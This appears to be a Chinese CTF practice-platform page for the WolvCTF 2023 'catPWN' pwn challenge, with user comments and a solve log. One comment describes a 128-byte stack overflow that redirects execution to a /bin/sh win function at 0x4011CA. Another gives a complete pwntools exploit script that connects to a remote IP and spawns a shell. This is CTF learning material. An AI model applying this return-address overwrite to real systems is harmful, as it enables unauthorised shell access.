catPWN 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: zhangqr
一血奖励: 0金币
解  决: 56
提  示:
描  述:
wctf{}
其  他: 下载
评论
13536169969 4月前

用乌班图,好吧

回复 0

nil126 10月前

ida中打开,64位的程序,发现一个128长度的buffer有堆栈溢出漏洞;还有一个win函数,里面有一条执行/bin/sh的指令,指令地址是0x4011CA。接下来要做的就是构造一个128+8+8字节长度的payload,128字节填充buffer,8字节填充执行gets时压栈的buffer指针,最后8字节写int64(0x4011CA)即下条指令位置。 调用gets时堆栈状态: |----

回复 1

dongwenjia 1年前

这题真恶心,要不是kali报错,我都不知道我pwn进去了,打通之后ls查看没内容,必须cat flag,什么都没显示出来后,在输入ls才看到flag,我真服了,还不是根目录。

回复 2
怪我喽 1年前

哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

回复 0

怪我喽 1年前

from pwn import* io = remote('82.157.146.43',?) payload=b'p'*0x88+p64(0x4011CA) io.send(payload) io.interactive() 用这个程序肯定没问题,就看你在kali中怎么执行操作了。这题真勾八

回复 3

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

AioKT 攻破了该题 6天前
wsmemail 攻破了该题 8天前
afag 攻破了该题 8天前
Bernie 攻破了该题 11天前
A9D9BD2A9516280E 攻破了该题 14天前
chengyi666 攻破了该题 28天前
tyyyyyyt 攻破了该题 1月前
Panda82 攻破了该题 2月前
longzhong 攻破了该题 2月前
fyut 攻破了该题 2月前
花落时相遇 攻破了该题 3月前
keylin 攻破了该题 3月前
19526226356 攻破了该题 3月前
sigmas 攻破了该题 3月前
king123 攻破了该题 4月前
LL2003 攻破了该题 4月前
梦游的小狐狸 攻破了该题 4月前
13536169969 攻破了该题 4月前
shuanghu 攻破了该题 4月前
EtHat 攻破了该题 6月前
问题反馈